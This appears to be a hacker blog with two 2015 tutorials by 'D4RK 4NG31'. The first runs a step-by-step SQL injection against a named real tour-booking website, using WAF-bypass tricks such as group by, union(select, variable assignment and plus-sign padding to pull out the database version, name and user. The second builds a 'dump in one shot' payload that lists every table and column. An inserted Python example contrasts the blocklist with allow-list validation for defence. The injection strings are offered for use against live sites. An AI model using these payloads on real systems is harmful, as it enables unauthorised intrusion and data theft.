Tuesday, September 15, 2015

SQLi Challenge Solution 1

First, hello to all :) from D4RK 4NG31

Target : http://exoticindiatours.in/pckge-details.php?id=2

Now, Let's Start

Finding which comment is working

http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 --   ====> no error, which means the comment (--) is working.

-- and # mostly behave the same

So, we don't have to use any comment :))

Now it's time to find the number of columns

First we'll use order by

http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked

order by is blocked, so we'll use group by instead of order by

http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> shows an error, which means it's working :D

http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error

http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error

So the query has 1 column, and the vuln column is 1

Now, time to use union select

http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked

It seems the site blocks special chars (*, !)

Now it's time to obfuscate the query.

For this we'll use union(select

With this form we type the columns like this: union(select (1),(2),(3),(4),(5))

Let's try..

http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....

Now it's time to use DIOS

As I already told you, the concat function is used to print multiple queries

http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))

We get an error... it seems the site is blocking the comma ( , )

To bypass this we'll use the variable method:

and@x:=

Let's try this :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat(version(),database(),user()) union(select (@x))

Again an error.

Let's test the WAF. First we'll see which word the site is blocking:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error

Concat( = Blocked

For this we'll use a large number of + characters

Let's do it:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++(0x3c703e496e6a6563746564206279204434524b20344e4733313c2f703e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#

Done :) Happy Injecting ;) Tutorial by D4RK 4NG31
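
Seen from the defending side, the steps above show a keyword blocklist being passed by equivalent syntax at every stage. The following is an added example, not code from the original post or from the site it describes: it models the filter as a literal substring blocklist (an assumption built from the strings the post reports as blocked) and compares it with allow-list validation of the id parameter. All function names are hypothetical and the sample values are constructed from the post, the last one shortened.

```python
import re
from urllib.parse import unquote_plus

# Assumption: the filter is a literal substring blocklist. The entries are
# the strings the post reports as blocked; the real filter is not on the page.
BLOCKLIST = ("order by", "union select", "concat(", "*", "!")

# Constructed samples: id values from the post, the last one shortened.
SAMPLES = [
    "2",
    "2 order by 122",
    "2 group by 122",
    "2 union select 1",
    "2 union(select (1))",
    "2 and@x:=concat+++++(version())+UNION(SELECT(@x))#",
]

ID_PATTERN = re.compile(r"[0-9]{1,9}")  # ASCII digits only, bounded length


def blocklist_allows(raw_value: str) -> bool:
    """Return True when the keyword blocklist lets the value through."""
    value = unquote_plus(raw_value).lower()
    return not any(token in value for token in BLOCKLIST)


def parse_id(raw_value: str) -> int:
    """Allow-list validation: accept the id only if it is a plain integer."""
    value = unquote_plus(raw_value)
    if not ID_PATTERN.fullmatch(value):
        raise ValueError("id must be a plain integer")
    return int(value)  # bind this integer as a query parameter, never concatenate


def allowlist_allows(raw_value: str) -> bool:
    try:
        parse_id(raw_value)
    except ValueError:
        return False
    return True


def compare(samples=SAMPLES):
    """Return (value, passes_blocklist, passes_allowlist) for each sample."""
    return [(s, blocklist_allows(s), allowlist_allows(s)) for s in samples]


if __name__ == "__main__":
    for value, by_blocklist, by_allowlist in compare():
        print(f"blocklist={by_blocklist!s:5} allowlist={by_allowlist!s:5} {value}")
```

Only the plain value 2 passes the allow-list, while the blocklist lets through every rewritten form the post uses.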

Saturday, September 12, 2015

Easy and Simple Way to make DIOS

First we'll print our cyber name

To use HTML tags we put them between apostrophes ( ' ), like '<p>Injected by D4RK 4NG31</p>'

And we'll use the Concat function for multiple queries

So, Let's Start..

Concat('<h2>Injected by D4RK 4NG31</h2>') :D Done

Now, to print the version, database and user, we'll use @@version, database() and user(), and <br> for a new line :)

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>')

Done :D We've printed everything; now it's time to print the tables and columns

Now for this we'll use this query

(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database())

Now add this query in DIOS

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>',(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database()))

HTML tags converted into hex:

Concat(0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,@@version,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,database(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,user(),0x3c62723e,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()))

DIOS completed. Now happy injecting :)))

Tutorial by D4RK 4NG31 ;)